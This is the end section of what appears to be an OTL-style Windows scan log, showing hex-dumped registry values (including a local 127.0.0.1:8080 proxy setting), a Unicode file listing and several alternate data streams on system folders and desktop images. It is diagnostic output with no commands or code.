00 00 00 00 00 10 00 00 02 00 00 00 19 8C 70 5A 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 50 B3 FE 52 01 00 00 00 BB 01 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 01 00 07 00 00 06 00 D0 C2 7C 12 00 00 00 00 01 00 00 00 E0 00 00 00 04 01 00 00 00 00 00 00 [Binary data over 200 bytes] "SavedLegacySettings" = 46 00 00 00 76 92 01 00 09 00 00 00 28 00 00 00 68 74 74 70 3D 31 32 37 2E 30 2E 30 2E 31 3A 38 30 38 30 3B 68 74 74 70 73 3D 31 32 37 2E 30 2E 30 2E 31 3A 38 30 38 30 07 00 00 00 3C 6C 6F 63 61 6C 3E 00 00 00 00 04 00 00 00 00 00 00 00 20 5E 69 3D 36 4A D1 01 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 17 00 00 00 00 00 00 00 FE 80 00 00 00 00 00 00 98 5F 8F 70 61 0B EB 4E 0B 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 5C 05 10 12 6C E0 80 11 60 E0 80 11 00 00 00 00 14 00 CC 00 48 43 6F 6E 00 00 00 00 01 00 00 00 00 00 00 00 5A 5A 5A 5A 00 FD 79 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FE FF FF FF 01 00 00 00 17 00 00 00 00 00 00 00 FE 80 00 00 00 00 00 00 25 05 9E 74 48 DD 14 2A 0D 00 00 00 00 00 00 00 17 00 00 00 00 00 00 00 FE 80 00 00 00 00 00 00 00 00 00 10 00 00 00 00 0D 00 00 00 00 00 00 00 1C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF 03 00 00 00 00 00 00 00 C0 A8 00 64 00 00 00 00 00 00 00 00 17 00 00 00 00 00 00 00 26 20 00 9B 00 00 00 00 00 00 00 00 19 8C 70 5A 00 00 00 00 FF FF FF FF 17 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CD 93 10 76 00 00 00 00 14 00 CC 00 98 53 10 12 64 09 68 09 A6 9B C9 00 00 00 00 00 3A C8 6D 76 00 00 00 00 03 00 00 00 48 43 6F 6E 00 00 80 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 C0 A8 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 02 00 00 00 19 8C 70 5A 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 50 B3 FE 52 01 00 00 00 BB 01 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 01 00 07 00 00 06 00 D0 C2 7C 12 00 00 00 00 01 00 00 00 E0 00 00 00 04 01 00 00 00 00 00 00 [Binary data over 200 bytes] [color=#E56717]========== Files - Unicode (All) ==========[/color] [2014/09/18 04:16:07 | 000,000,000 | ---D | C](C:\Users\Lorenzo\Documents\?? ???) -- C:\Users\Lorenzo\Documents\넥슨 플러그 [2012/06/03 19:54:28 | 000,000,000 | ---D | M](C:\Users\Lorenzo\Documents\?? ???) -- C:\Users\Lorenzo\Documents\넥슨 플러그 [color=#E56717]========== Alternate Data Streams ==========[/color] @Alternate Data Stream - 271 bytes -> C:\Windows\System32\drivers:GbpKmAp.lst @Alternate Data Stream - 24 bytes -> C:\Windows:F51A82C2616A8ED1 @Alternate Data Stream - 2 bytes -> C:\Windows\System32:925A618E_Uni.gbp @Alternate Data Stream - 188 bytes -> C:\Users\Lorenzo\Desktop\digi2.jpeg:3or4kl4x13tuuug3Byamue2s4b @Alternate Data Stream - 188 bytes -> C:\Users\Lorenzo\Desktop\digi1.jpeg:3or4kl4x13tuuug3Byamue2s4b < End of report >